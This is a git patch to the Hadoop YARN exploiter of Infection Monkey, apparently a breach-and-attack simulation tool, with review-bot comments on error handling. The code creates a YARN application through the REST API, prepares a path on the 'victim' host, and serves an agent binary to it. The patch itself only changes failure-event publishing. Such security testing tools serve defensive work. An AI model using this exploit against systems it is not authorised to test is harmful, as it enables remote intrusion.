From bee1047024bae4a37f00ae95abf412ee092a13b7 Mon Sep 17 00:00:00 2001
From: Kekoa Kaaikala
Date: Tue, 4 Oct 2022 19:16:22 +0000
Subject: [PATCH] Agent: Update hadoop failed event publishing
---
 monkey/infection_monkey/exploit/hadoop.py | 27 +++++++++++------------
 1 file changed, 13 insertions(+), 14 deletions(-)
diff --git a/monkey/infection_monkey/exploit/hadoop.py b/monkey/infection_monkey/exploit/hadoop.py
index deece024c..743cf793e 100644
--- a/monkey/infection_monkey/exploit/hadoop.py
+++ b/monkey/infection_monkey/exploit/hadoop.py
@@ -55,22 +55,13 @@ class HadoopExploiter(WebRCE):
 )
 return self.exploit_result
- try:
- monkey_path_on_victim = get_agent_dst_path(self.host)
- except KeyError:
- self.exploit_result.error_message = f"No coressponding agent found for {self.host}"
- self._publish_exploitation_event(
- target=self.host.ip_addr,
- exploitation_success=False,
- error_message=self.exploit_result.error_message,
- tags=(HADOOP_EXPLOITER_TAG,),
- )
- return self.exploit_result
+ monkey_path_on_victim = get_agent_dst_path(self.host)
 http_path, http_thread = HTTPTools.create_locked_transfer(
 self.host, str(monkey_path_on_victim), self.agent_binary_repository
 )
+ tags = (HADOOP_EXPLOITER_TAG, T1203_ATTACK_TECHNIQUE_TAG)
 try:
 command = self._build_command(monkey_path_on_victim, http_path)
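Review bot: With the `try/except KeyError` removed, a failure inside `get_agent_dst_path(self.host)` now leaves the method as an uncaught exception and no failed-exploitation event is published for that host. Whether the helper can still raise is not visible in this diff; if it can, keep a handler, and if it cannot, a one-line comment such as `# get_agent_dst_path() no longer raises KeyError` would record why the guard went away. The new `tags` tuple is defined here, but the success call in the next hunk still spells out `tags=(HADOOP_EXPLOITER_TAG, T1203_ATTACK_TECHNIQUE_TAG)` inline; passing `tags=tags` there would keep the success and failure paths from drifting apart. The enclosing method starts and ends outside the hunk.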
@@ -89,13 +80,21 @@ class HadoopExploiter(WebRCE):
 propagation_success=True,
 tags=(HADOOP_EXPLOITER_TAG, T1203_ATTACK_TECHNIQUE_TAG),
 )
+ else:
+ error_message = f"Failed to exploit via {self.vulnerable_urls[0]}"
+ self._publish_exploitation_event(self.host.ip_addr, False, tags, error_message)
+ self._publish_propagation_event(self.host.ip_addr, False, tags, error_message)
+ except requests.RequestException as err:
+ error_message = str(err)
+ self._publish_exploitation_event(self.host.ip_addr, False, tags, error_message)
+ self._publish_propagation_event(self.host.ip_addr, False, tags, error_message)
 finally:
 http_thread.join(self.DOWNLOAD_TIMEOUT)
 http_thread.stop()
 return self.exploit_result
- def exploit(self, url, command):
+ def exploit(self, url: str, command: str):
 if self._is_interrupted():
 self._set_interrupted()
 return False
@@ -104,8 +103,8 @@ class HadoopExploiter(WebRCE):
 resp = requests.post(
 posixpath.join(url, "ws/v1/cluster/apps/new-application"), timeout=LONG_REQUEST_TIMEOUT
 )
- resp = json.loads(resp.content)
- app_id = resp["application-id"]
+ resp_dict = json.loads(resp.content)
+ app_id = resp_dict["application-id"]
 # Create a random name for our application in YARN
 # random.SystemRandom can block indefinitely in Linux
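Review bot: The added `except requests.RequestException` covers only transport errors, while `exploit()` (next hunk) also runs `json.loads(resp.content)` and `resp_dict["application-id"]` on whatever the remote service returns; a non-JSON or unexpected body raises `ValueError` or `KeyError`, so neither failure event is published and the exception leaves the method (the `finally` cleanup still runs). Widening the clause to `except (requests.RequestException, ValueError, KeyError) as err:` would keep such failed attempts visible in the event stream. The two failure branches also never assign `self.exploit_result.error_message`, which the handler removed in the first hunk did, so the returned result may carry no reason unless it is set elsewhere. The positional `False, tags, error_message` arguments depend on a parameter order not shown in this diff; keywords, as in the success call above (`propagation_success=True, tags=...`), would be safer. The enclosing method starts outside the hunk.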